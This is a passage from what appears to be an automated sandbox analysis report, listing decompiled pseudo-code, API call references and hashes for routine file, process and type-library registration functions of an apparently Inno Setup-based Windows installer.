						_t44 =  *0x59a1c4; // 0x59a21c
						if(E0040868C( *((intOrPtr*)(_t49 + 0x7c)), _t44) == 0 || GetMenuItemCount(E0059BF18(_t49, _t45, _t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t49 + 0xbc));
							 *(_t49 + 0xbc) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}












                                                                    0x0059bde0
                                                                    0x0059bde4
                                                                    0x0059bdea
                                                                    0x0059bdf4
                                                                    0x0059bdf6
                                                                    0x00000000
                                                                    0x0059bdf6
                                                                    0x0059be02
                                                                    0x0059be07
                                                                    0x00000000
                                                                    0x0059be09
                                                                    0x0059be1b
                                                                    0x0059be20
                                                                    0x0059be24
                                                                    0x0059be29
                                                                    0x0059be32
                                                                    0x0059be3c
                                                                    0x0059be43
                                                                    0x0059be53
                                                                    0x0059be58
                                                                    0x0059be58
                                                                    0x0059be5a
                                                                    0x0059be5b
                                                                    0x0059be61
                                                                    0x0059be67
                                                                    0x0059bea2
                                                                    0x0059bea4
                                                                    0x0059bea9
                                                                    0x00000000
                                                                    0x0059beaf
                                                                    0x0059be6c
                                                                    0x0059be79
                                                                    0x00000000
                                                                    0x0059be8c
                                                                    0x0059be93
                                                                    0x0059be9a
                                                                    0x00000000
                                                                    0x0059be9a
                                                                    0x0059be79
                                                                    0x0059be61
                                                                    0x0059beb6

                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                    • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                                    • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                    • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00423A20, Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 82%
                                                                    			E00423A20(void* __eax) {
				signed char _t10;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t17;
				WCHAR* _t18;

				_t17 = __eax;
				_t18 = E0040B278(__eax);
				DeleteFileW(_t18);
				asm("sbb ebx, ebx");
				_t15 = _t14 + 1;
				if(_t15 == 0) {
					_t16 = GetLastError();
					_t10 = GetFileAttributesW(_t18);
					if(_t10 == 0xffffffff || (_t10 & 0x00000004) == 0 || (_t10 & 0x00000010) == 0) {
						SetLastError(_t16);
					} else {
						RemoveDirectoryW(E0040B278(_t17));
						asm("sbb ebx, ebx");
						_t15 = _t15 + 1;
					}
				}
				return _t15;
			}









                                                                    0x00423a24
                                                                    0x00423a2d
                                                                    0x00423a30
                                                                    0x00423a38
                                                                    0x00423a3a
                                                                    0x00423a3d
                                                                    0x00423a44
                                                                    0x00423a47
                                                                    0x00423a4f
                                                                    0x00423a70
                                                                    0x00423a5a
                                                                    0x00423a62
                                                                    0x00423a6a
                                                                    0x00423a6c
                                                                    0x00423a6c
                                                                    0x00423a4f
                                                                    0x00423a7b

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                    • GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                    • String ID:
                                                                    • API String ID: 2814369299-0
                                                                    • Opcode ID: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
                                                                    • Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
                                                                    • Opcode Fuzzy Hash: 5cf6f583151de2db28f1a3568ac7f7c21abc363b183444b2113c2190a0e75535
                                                                    • Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E005B631C() {
				intOrPtr _v4;
				void* _v8;
				int _t5;
				void* _t6;
				intOrPtr _t12;
				struct HHOOK__* _t14;
				void* _t19;
				void* _t20;

				if( *0x6d57c0 != 0) {
					_t14 =  *0x6d57c0; // 0x0
					UnhookWindowsHookEx(_t14);
				}
				 *0x6d57c0 = 0;
				_v4 = 0x6d57c4;
				_t5 = 0;
				asm("lock xchg [edx], eax");
				_v8 = 0;
				if(_v8 != 0) {
					_t6 =  *0x6d57bc; // 0x0
					SetEvent(_t6);
					if(GetCurrentThreadId() !=  *0x6d57b8) {
						while(MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff) != 0) {
							_t12 =  *0x6d579c; // 0x0
							E005B871C(_t12, _t19, _t20);
						}
					}
					_t5 = CloseHandle(_v8);
				}
				return _t5;
			}











                                                                    0x005b6326
                                                                    0x005b6328
                                                                    0x005b632e
                                                                    0x005b632e
                                                                    0x005b6335
                                                                    0x005b633a
                                                                    0x005b6346
                                                                    0x005b6348
                                                                    0x005b634b
                                                                    0x005b6352
                                                                    0x005b6354
                                                                    0x005b635a
                                                                    0x005b636a
                                                                    0x005b6378
                                                                    0x005b636e
                                                                    0x005b6373
                                                                    0x005b6373
                                                                    0x005b6378
                                                                    0x005b6395
                                                                    0x005b6395
                                                                    0x005b639c

                                                                    APIs
                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                                    • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                    • String ID:
                                                                    • API String ID: 2132507429-0
                                                                    • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                    • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                                    • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                    • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E006B8F64(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				WCHAR* _t43;
				char _t58;
				intOrPtr _t68;
				void* _t72;
				signed int _t74;
				void* _t78;

				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = __edx;
				_v16 = __eax;
				_push(_t78);
				_push(0x6b9062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffffe4;
				E0040A1C8(_v20);
				E005C5428(_v16, 0,  &_v8);
				_t72 = 0;
				_t58 = 0;
				do {
					_v32 = _t58;
					_v28 = 0;
					E004244F8(L"isRS-%.3u.tmp", 0,  &_v32,  &_v24);
					E0040B4C8( &_v12, _v24, _v8);
					_t74 = GetFileAttributesW(E0040B278(_v12));
					if(_t74 == 0xffffffff) {
						L5:
						_t43 = E0040B278(_v12);
						if(MoveFileExW(E0040B278(_v16), _t43, 1) == 0) {
							_t72 = _t72 + 1;
							if(_t72 == 0xa) {
								break;
							}
							goto L8;
						}
						E0040A5A8(_v20, _v12);
						break;
					}
					if((_t74 & 0x00000010) != 0) {
						goto L8;
					}
					if((_t74 & 0x00000001) != 0) {
						SetFileAttributesW(E0040B278(_v12), _t74 & 0xfffffffe);
					}
					goto L5;
					L8:
					_t58 = _t58 + 1;
				} while (_t58 != 0x3e8);
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E006B9069);
				E0040A1C8( &_v24);
				return E0040A228( &_v12, 2);
			}
















                                                                    0x006b8f6f
                                                                    0x006b8f72
                                                                    0x006b8f75
                                                                    0x006b8f78
                                                                    0x006b8f7b
                                                                    0x006b8f80
                                                                    0x006b8f81
                                                                    0x006b8f86
                                                                    0x006b8f89
                                                                    0x006b8f8f
                                                                    0x006b8f9a
                                                                    0x006b8f9f
                                                                    0x006b8fa1
                                                                    0x006b8fa3
                                                                    0x006b8fa7
                                                                    0x006b8faa
                                                                    0x006b8fb8
                                                                    0x006b8fc6
                                                                    0x006b8fd9
                                                                    0x006b8fde
                                                                    0x006b9002
                                                                    0x006b9007
                                                                    0x006b901d
                                                                    0x006b902c
                                                                    0x006b9030
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006b9030
                                                                    0x006b9025
                                                                    0x00000000
                                                                    0x006b9025
                                                                    0x006b8fe6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006b8fee
                                                                    0x006b8ffd
                                                                    0x006b8ffd
                                                                    0x00000000
                                                                    0x006b9032
                                                                    0x006b9032
                                                                    0x006b9033
                                                                    0x006b9041
                                                                    0x006b9044
                                                                    0x006b9047
                                                                    0x006b904f
                                                                    0x006b9061

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$Attributes$Move
                                                                    • String ID: isRS-%.3u.tmp
                                                                    • API String ID: 3839737484-3657609586
                                                                    • Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                                    • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                                    • Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
                                                                    • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0060C038(void* __eax, WCHAR* __ecx, WCHAR* __edx, void* __eflags, struct _PROCESS_INFORMATION* _a4, struct _STARTUPINFOW* _a8, char _a12, void* _a16, char _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, struct _SECURITY_ATTRIBUTES* _a32) {
				int _v8;
				char _v16;
				long _v20;
				intOrPtr _t42;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t50 = _t52;
				_t53 = _t52 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t50);
					_push(0x60c0b2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t53;
					_t5 =  &_a12; // 0x624d3e
					_t7 =  &_a20; // 0x624d58
					_v8 = CreateProcessW(__edx, __ecx, _a32, _a28, _a24,  *_t7, _a16,  *_t5, _a8, _a4);
					_v20 = GetLastError();
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E0060C0B9);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}










                                                                    0x0060c039
                                                                    0x0060c03b
                                                                    0x0060c053
                                                                    0x0060c05e
                                                                    0x0060c05f
                                                                    0x0060c064
                                                                    0x0060c067
                                                                    0x0060c072
                                                                    0x0060c07a
                                                                    0x0060c091
                                                                    0x0060c099
                                                                    0x0060c09e
                                                                    0x0060c0a1
                                                                    0x0060c0a4
                                                                    0x0060c0b1
                                                                    0x0060c055
                                                                    0x0060c057
                                                                    0x0060c0cb
                                                                    0x0060c0cb

                                                                    APIs
                                                                    • CreateProcessW.KERNEL32 ref: 0060C08C
                                                                    • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateErrorLastProcess
                                                                    • String ID: >Mb$XMb
                                                                    • API String ID: 2919029540-2660256435
                                                                    • Opcode ID: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
                                                                    • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                                    • Opcode Fuzzy Hash: cc071ed51034117dff2eb24da789fdfe7696ce97c15fb88c7d50c2d671ecce20
                                                                    • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 55%
                                                                    			E006B6998(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				int _t22;
				intOrPtr _t28;
				intOrPtr _t41;
				void* _t47;

				_v8 = 0;
				_t44 = __edx;
				_t32 = __eax;
				_push(_t47);
				_push(0x6b6a40);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47 + 0xffffffa8;
				_push(0x6b6a5c);
				_push(__eax);
				_push(E006B6A6C);
				_push(__edx);
				E0040B550( &_v8, __eax, 4, __edi, __edx);
				E00407760( &_v76, 0x44);
				_v76.cb = 0x44;
				_t22 = CreateProcessW(0, E0040B278(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
				_t49 = _t22;
				if(_t22 == 0) {
					_t28 =  *0x6cded8; // 0x6d5c28
					_t8 = _t28 + 0x20c; // 0x0
					E006B68EC( *_t8, _t32, 0, _t44, _t49);
				}
				CloseHandle(_v92.hThread);
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E006B6A47);
				return E0040A1C8( &_v8);
			}










                                                                    0x006b69a2
                                                                    0x006b69a5
                                                                    0x006b69a7
                                                                    0x006b69ab
                                                                    0x006b69ac
                                                                    0x006b69b1
                                                                    0x006b69b4
                                                                    0x006b69b7
                                                                    0x006b69bc
                                                                    0x006b69bd
                                                                    0x006b69c2
                                                                    0x006b69cb
                                                                    0x006b69da
                                                                    0x006b69df
                                                                    0x006b6a05
                                                                    0x006b6a0a
                                                                    0x006b6a0c
                                                                    0x006b6a0e
                                                                    0x006b6a13
                                                                    0x006b6a19
                                                                    0x006b6a19
                                                                    0x006b6a22
                                                                    0x006b6a2c
                                                                    0x006b6a2f
                                                                    0x006b6a32
                                                                    0x006b6a3f

                                                                    APIs
                                                                    • CreateProcessW.KERNEL32 ref: 006B6A05
                                                                    • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                                      • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                    • String ID: (\m$D
                                                                    • API String ID: 3798668922-1981685662
                                                                    • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                    • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                                    • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                    • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E0062460C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _t19;
				char _t20;
				void* _t34;
				intOrPtr _t39;
				intOrPtr _t45;

				_t42 = __esi;
				_push(0);
				_push(0);
				_push(0);
				_push(_t45);
				_push(0x6246a6);
				 *[fs:eax] = _t45;
				E005C52C8(__eax,  &_v16, _t45,  *[fs:eax]);
				E0040B368( &_v8, _v16);
				_push(E0040EC28( &_v12));
				_t19 = E0040AEF4(_v8);
				_t34 = _t19;
				_push(_t34);
				L0043C244();
				if(_t19 != 0) {
					E0060CE98(L"LoadTypeLib", _t34, _t19, __esi);
				}
				_push(0);
				_push(_t34);
				_t20 = _v12;
				_push(_t20);
				L0043C24C();
				if(_t20 != 0) {
					E0060CE98(L"RegisterTypeLib", _t34, _t20, _t42);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E006246AD);
				E0040A1C8( &_v16);
				E0040EC28( &_v12);
				return E0040A210( &_v8);
			}











                                                                    0x0062460c
                                                                    0x0062460f
                                                                    0x00624611
                                                                    0x00624613
                                                                    0x0062461a
                                                                    0x0062461b
                                                                    0x00624623
                                                                    0x0062462b
                                                                    0x00624636
                                                                    0x00624643
                                                                    0x00624647
                                                                    0x0062464c
                                                                    0x0062464e
                                                                    0x0062464f
                                                                    0x00624656
                                                                    0x0062465f
                                                                    0x0062465f
                                                                    0x00624664
                                                                    0x00624666
                                                                    0x00624667
                                                                    0x0062466a
                                                                    0x0062466b
                                                                    0x00624672
                                                                    0x0062467b
                                                                    0x0062467b
                                                                    0x00624682
                                                                    0x00624685
                                                                    0x00624688
                                                                    0x00624690
                                                                    0x00624698
                                                                    0x006246a5

                                                                    APIs
                                                                      • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                    • API String ID: 4170313675-2435364021
                                                                    • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
